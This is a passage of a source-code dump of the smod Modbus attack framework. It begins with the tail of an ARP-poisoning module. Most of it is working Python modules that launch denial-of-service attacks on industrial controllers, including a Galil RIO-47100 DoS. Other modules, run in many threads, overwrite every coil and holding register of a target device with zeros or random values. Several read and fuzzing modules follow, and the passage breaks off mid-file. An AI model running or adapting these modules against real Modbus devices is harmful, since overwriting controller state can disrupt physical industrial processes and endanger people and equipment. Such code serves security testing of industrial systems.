None): 74 | self.printLine('[-] Failed to get Master MAC',bcolors.WARNING) 75 | sys.exit(0) 76 | else: 77 | self.printLine('[+] Master MAC: '+gatway_mac,bcolors.OKGREEN) 78 | 79 | target_mac = get_mac(target_ip) 80 | if(target_mac == None): 81 | self.printLine('[-] Failed to get Slave MAC',bcolors.WARNING) 82 | os._exit(0) 83 | else: 84 | self.printLine('[+] Slave MAC: '+target_mac,bcolors.OKGREEN) 85 | 86 | def signal_handler(signal, frame): 87 | sys.exit(0) 88 | 89 | signal.signal(signal.SIGINT, signal_handler) 90 | poison_thread = threading.Thread(target = poison_target,args=(gatway_ip,gatway_mac,target_ip,target_mac)) 91 | poison_thread.start() 92 | 93 | 94 | 95 | 96 | 97 | 98 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/arp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/dos/arp.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/galilRIO.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | import random 4 | 5 | from System.Core.Global import * 6 | from System.Core.Colors import * 7 | from System.Core.Modbus import * 8 | from System.Lib import ipcalc 9 | 10 | down = False 11 | THREADS = list() 12 | class Module: 13 | 14 | 15 | info = { 16 | 'Name': 'DOS Galil RIO-47100', 17 | 'Author': ['@enddo'], 18 | 'Description': ("DOS Galil RIO-47100"), 19 | 20 | } 21 | options = { 22 | 'RHOST' :['' ,True ,'The target IP address'], 23 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 24 | 'UID' :['' ,True ,'Modbus Slave UID.'], 25 | 'Threads' :[24 ,False ,'The number of concurrent threads'], 26 | 'Output' :[False ,False ,'The stdout save in output directory'] 27 | } 28 | output = '' 29 | 30 | def exploit(self): 31 | 32 | moduleName = self.info['Name'] 33 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 34 | for i in range(int(self.options['Threads'][0])): 35 | if(self.options['RHOST'][0]): 36 | thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],)) 37 | thread.start() 38 | THREADS.append(thread) 39 | else: 40 | break 41 | for thread in THREADS: 42 | thread.join() 43 | if(down): 44 | self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING) 45 | if(self.options['Output'][0]): 46 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 47 | self.output = '' 48 | 49 | def printLine(self,str,color): 50 | self.output += str + '\n' 51 | if(str.find('[+]') != -1): 52 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 53 | elif(str.find('[-]') != -1): 54 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 55 | else: 56 | print str 57 | 58 | def do(self,ip): 59 | global down 60 | if(down == True): 61 | return None 62 | while True: 63 | c = connectToTarget(ip,self.options['RPORT'][0]) 64 | if(c == None): 65 | down = True 66 | return None 67 | try: 68 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU01_Read_Coils(),timeout=timeout, verbose=0) 69 | except: 70 | break 71 | 72 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/galilRIO.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/dos/galilRIO.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/writeAllCoils.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | import random 4 | 5 | from System.Core.Global import * 6 | from System.Core.Colors import * 7 | from System.Core.Modbus import * 8 | from System.Lib import ipcalc 9 | 10 | down = False 11 | class Module: 12 | 13 | 14 | info = { 15 | 'Name': 'DOS Write All Coils', 16 | 'Author': ['@enddo'], 17 | 'Description': ("DOS With Write All Coils"), 18 | 19 | } 20 | options = { 21 | 'RHOST' :['' ,True ,'The target IP address'], 22 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 23 | 'UID' :['' ,True ,'Modbus Slave UID.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[False ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | for i in range(int(self.options['Threads'][0])): 34 | if(self.options['RHOST'][0]): 35 | thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],)) 36 | thread.start() 37 | THREADS.append(thread) 38 | else: 39 | break 40 | if(down): 41 | break 42 | 43 | for thread in THREADS: 44 | thread.join() 45 | if(down): 46 | self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING) 47 | if(self.options['Output'][0]): 48 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 49 | self.output = '' 50 | 51 | def printLine(self,str,color): 52 | self.output += str + '\n' 53 | if(str.find('[+]') != -1): 54 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 55 | elif(str.find('[-]') != -1): 56 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 57 | else: 58 | print str 59 | 60 | def do(self,ip): 61 | global down 62 | if(down == True): 63 | return None 64 | for i in range(0xffff): 65 | c = connectToTarget(ip,self.options['RPORT'][0]) 66 | if(c == None): 67 | down = True 68 | return None 69 | try: 70 | self.printLine('[+] Write on Address ' + str(int(hex(i|0x1111),16)),bcolors.OKGREEN) 71 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU05_Write_Single_Coil(outputAddr=int(hex(i|0x1111),16),outputValue=int('0x0000',16)),timeout=timeout, verbose=0) 72 | ans = ModbusADU_Answer(str(ans)) 73 | self.printLine('[+] Response is :',bcolors.OKGREEN) 74 | ans.show() 75 | except: 76 | pass 77 | 78 | 79 | 80 | 81 | 82 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/writeAllCoils.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/dos/writeAllCoils.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/writeAllRegister.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | import random 4 | 5 | from System.Core.Global import * 6 | from System.Core.Colors import * 7 | from System.Core.Modbus import * 8 | from System.Lib import ipcalc 9 | 10 | down = False 11 | class Module: 12 | 13 | 14 | info = { 15 | 'Name': 'DOS Write All Register', 16 | 'Author': ['@enddo'], 17 | 'Description': ("DOS With Write All Register Function"), 18 | 19 | } 20 | options = { 21 | 'RHOST' :['' ,True ,'The target IP address'], 22 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 23 | 'UID' :['' ,True ,'Modbus Slave UID.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[False ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | for i in range(int(self.options['Threads'][0])): 34 | if(self.options['RHOST'][0]): 35 | thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],)) 36 | thread.start() 37 | THREADS.append(thread) 38 | else: 39 | break 40 | for thread in THREADS: 41 | thread.join() 42 | if(down): 43 | self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING) 44 | break 45 | if(self.options['Output'][0]): 46 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 47 | self.output = '' 48 | 49 | def printLine(self,str,color): 50 | self.output += str + '\n' 51 | if(str.find('[+]') != -1): 52 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 53 | elif(str.find('[-]') != -1): 54 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 55 | else: 56 | print str 57 | 58 | def do(self,ip): 59 | global down 60 | for i in range(0xffff): 61 | if(down): 62 | break 63 | c = connectToTarget(ip,self.options['RPORT'][0]) 64 | if(c == None): 65 | down = True 66 | return None 67 | try: 68 | self.printLine('[+] Write on Register Address ' + str(int(hex(i|0x1111),16)),bcolors.OKGREEN) 69 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU06_Write_Single_Register(registerAddr=int(hex(i|0x1111),16),registerValue=int(hex(random.randint(0,16**4-1)|0x1111),16)),timeout=timeout, verbose=0) 70 | ans = ModbusADU_Answer(str(ans)) 71 | self.printLine('[+] Response is :',bcolors.OKGREEN) 72 | ans.show() 73 | except: 74 | pass 75 | 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/writeAllRegister.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/dos/writeAllRegister.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/writeSingleCoils.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | import random 4 | 5 | from System.Core.Global import * 6 | from System.Core.Colors import * 7 | from System.Core.Modbus import * 8 | from System.Lib import ipcalc 9 | 10 | down = False 11 | class Module: 12 | 13 | 14 | info = { 15 | 'Name': 'DOS Write Single Coil', 16 | 'Author': ['@enddo'], 17 | 'Description': ("DOS With Write Single Coil Function"), 18 | 19 | } 20 | options = { 21 | 'RHOST' :['' ,True ,'The target IP address'], 22 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 23 | 'UID' :['' ,True ,'Modbus Slave UID.'], 24 | 'Threads' :[24 ,False ,'The number of concurrent threads'], 25 | 'Output' :[False ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | for i in range(int(self.options['Threads'][0])): 34 | if(self.options['RHOST'][0]): 35 | thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],)) 36 | thread.start() 37 | THREADS.append(thread) 38 | else: 39 | break 40 | if(down): 41 | break 42 | 43 | for thread in THREADS: 44 | thread.join() 45 | if(down): 46 | self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING) 47 | if(self.options['Output'][0]): 48 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 49 | self.output = '' 50 | 51 | def printLine(self,str,color): 52 | self.output += str + '\n' 53 | if(str.find('[+]') != -1): 54 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 55 | elif(str.find('[-]') != -1): 56 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 57 | else: 58 | print str 59 | 60 | def do(self,ip): 61 | global down 62 | if(down == True): 63 | return None 64 | while True: 65 | c = connectToTarget(ip,self.options['RPORT'][0]) 66 | if(c == None): 67 | down = True 68 | return None 69 | try: 70 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU05_Write_Single_Coil(outputAddr=int(hex(random.randint(0,16**4-1)|0x1111),16),outputValue=int('0x0000',16)),timeout=timeout, verbose=0) 71 | except: 72 | pass 73 | 74 | 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/writeSingleCoils.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/dos/writeSingleCoils.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/writeSingleRegister.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | import random 4 | 5 | from System.Core.Global import * 6 | from System.Core.Colors import * 7 | from System.Core.Modbus import * 8 | from System.Lib import ipcalc 9 | 10 | down = False 11 | class Module: 12 | 13 | 14 | info = { 15 | 'Name': 'DOS Write Single Register', 16 | 'Author': ['@enddo'], 17 | 'Description': ("DOS Write Single Register Function"), 18 | 19 | } 20 | options = { 21 | 'RHOST' :['' ,True ,'The target IP address'], 22 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 23 | 'UID' :['' ,True ,'Modbus Slave UID.'], 24 | 'Threads' :[24 ,False ,'The number of concurrent threads'], 25 | 'Output' :[False ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | for i in range(int(self.options['Threads'][0])): 34 | if(self.options['RHOST'][0]): 35 | thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],)) 36 | thread.start() 37 | THREADS.append(thread) 38 | else: 39 | break 40 | for thread in THREADS: 41 | thread.join() 42 | if(down): 43 | self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING) 44 | break 45 | if(self.options['Output'][0]): 46 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 47 | self.output = '' 48 | 49 | def printLine(self,str,color): 50 | self.output += str + '\n' 51 | if(str.find('[+]') != -1): 52 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 53 | elif(str.find('[-]') != -1): 54 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 55 | else: 56 | print str 57 | 58 | def do(self,ip): 59 | global down 60 | while True: 61 | if(down): 62 | break 63 | c = connectToTarget(ip,self.options['RPORT'][0]) 64 | if(c == None): 65 | down = True 66 | return None 67 | try: 68 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU06_Write_Single_Register(registerAddr=int(hex(random.randint(0,16**4-1)|0x1111),16),registerValue=int(hex(random.randint(0,16**4-1)|0x1111),16)),timeout=timeout, verbose=0) 69 | except: 70 | pass 71 | 72 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/dos/writeSingleRegister.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/dos/writeSingleRegister.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/fuzzing.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/fuzzing.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readCoils.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Read Coils Function', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Read Coils Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'StartAddr' :['0x0000' ,True ,'Start Address.'], 23 | 'Quantity' :['0x0001' ,True ,'Registers Values.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU01_Read_Coils(startAddr=int(self.options['StartAddr'][0],16),quantity=int(self.options['Quantity'][0],16)),timeout=timeout, verbose=0) 66 | ans = ModbusADU_Answer(str(ans)) 67 | self.printLine('[+] Response is :',bcolors.OKGREEN) 68 | ans.show() 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readCoils.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/readCoils.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readCoilsException.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Read Coils Exception Function', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Read Coils Exception Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :['' ,True ,'Modbus Slave UID.'], 22 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 23 | 'Output' :[True ,False ,'The stdout save in output directory'] 24 | } 25 | output = '' 26 | 27 | def exploit(self): 28 | 29 | moduleName = self.info['Name'] 30 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 31 | ips = list() 32 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 33 | ips.append(str(ip)) 34 | while ips: 35 | for i in range(int(self.options['Threads'][0])): 36 | if(len(ips) > 0): 37 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 38 | thread.start() 39 | THREADS.append(thread) 40 | else: 41 | break 42 | for thread in THREADS: 43 | thread.join() 44 | if(self.options['Output'][0]): 45 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 46 | self.output = '' 47 | 48 | def printLine(self,str,color): 49 | self.output += str + '\n' 50 | if(str.find('[+]') != -1): 51 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 52 | elif(str.find('[-]') != -1): 53 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 54 | else: 55 | print str 56 | 57 | def do(self,ip): 58 | c = connectToTarget(ip,self.options['RPORT'][0]) 59 | if(c == None): 60 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 61 | return None 62 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 63 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU01_Read_Coils_Exception(),timeout=timeout, verbose=0) 64 | ans = ModbusADU_Answer(str(ans)) 65 | self.printLine('[+] Response is :',bcolors.OKGREEN) 66 | ans.show() 67 | 68 | 69 | 70 | 71 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readCoilsException.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/readCoilsException.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readDiscreteInput.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Read Discrete Inputs', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Read Discrete Inputs Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'StartAddr' :['0x0000' ,True ,'Start Address.'], 23 | 'Quantity' :['0x0001' ,True ,'Registers Values.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU02_Read_Discrete_Inputs(startAddr=int(self.options['StartAddr'][0],16),quantity=int(self.options['Quantity'][0],16)),timeout=timeout, verbose=0) 66 | ans = ModbusADU_Answer(str(ans)) 67 | self.printLine('[+] Response is :',bcolors.OKGREEN) 68 | ans.show() 69 | 70 | 71 | 72 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readDiscreteInput.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/readDiscreteInput.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readDiscreteInputException.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Discrete Inputs Exception Function', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Read Discrete Inputs Exception Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :['' ,True ,'Modbus Slave UID.'], 22 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 23 | 'Output' :[True ,False ,'The stdout save in output directory'] 24 | } 25 | output = '' 26 | 27 | def exploit(self): 28 | 29 | moduleName = self.info['Name'] 30 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 31 | ips = list() 32 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 33 | ips.append(str(ip)) 34 | while ips: 35 | for i in range(int(self.options['Threads'][0])): 36 | if(len(ips) > 0): 37 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 38 | thread.start() 39 | THREADS.append(thread) 40 | else: 41 | break 42 | for thread in THREADS: 43 | thread.join() 44 | if(self.options['Output'][0]): 45 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 46 | self.output = '' 47 | 48 | def printLine(self,str,color): 49 | self.output += str + '\n' 50 | if(str.find('[+]') != -1): 51 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 52 | elif(str.find('[-]') != -1): 53 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 54 | else: 55 | print str 56 | 57 | def do(self,ip): 58 | c = connectToTarget(ip,self.options['RPORT'][0]) 59 | if(c == None): 60 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 61 | return None 62 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 63 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU02_Read_Discrete_Inputs_Exception(),timeout=timeout, verbose=0) 64 | ans = ModbusADU_Answer(str(ans)) 65 | self.printLine('[+] Response is :',bcolors.OKGREEN) 66 | ans.show() 67 | 68 | 69 | 70 | 71 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readDiscreteInputException.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/readDiscreteInputException.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readExceptionStatus.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Read Exception Status', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Read Exception Status Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :['' ,True ,'Modbus Slave UID.'], 22 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 23 | 'Output' :[True ,True ,'The stdout save in output directory'] 24 | } 25 | output = '' 26 | 27 | def exploit(self): 28 | 29 | moduleName = self.info['Name'] 30 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 31 | ips = list() 32 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 33 | ips.append(str(ip)) 34 | while ips: 35 | for i in range(int(self.options['Threads'][0])): 36 | if(len(ips) > 0): 37 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 38 | thread.start() 39 | THREADS.append(thread) 40 | else: 41 | break 42 | for thread in THREADS: 43 | thread.join() 44 | if(self.options['Output'][0]): 45 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 46 | self.output = '' 47 | 48 | def printLine(self,str,color): 49 | self.output += str + '\n' 50 | if(str.find('[+]') != -1): 51 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 52 | elif(str.find('[-]') != -1): 53 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 54 | else: 55 | print str 56 | 57 | def do(self,ip): 58 | c = connectToTarget(ip,self.options['RPORT'][0]) 59 | if(c == None): 60 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 61 | return None 62 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 63 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU07_Read_Exception_Status(),timeout=timeout, verbose=0) 64 | ans = ModbusADU_Answer(str(ans)) 65 | self.printLine('[+] Response is :',bcolors.OKGREEN) 66 | ans.show() 67 | 68 | 69 | 70 | 71 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readExceptionStatus.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/readExceptionStatus.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readHoldingRegister.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Read Holding Registers', 14 | 'Author': 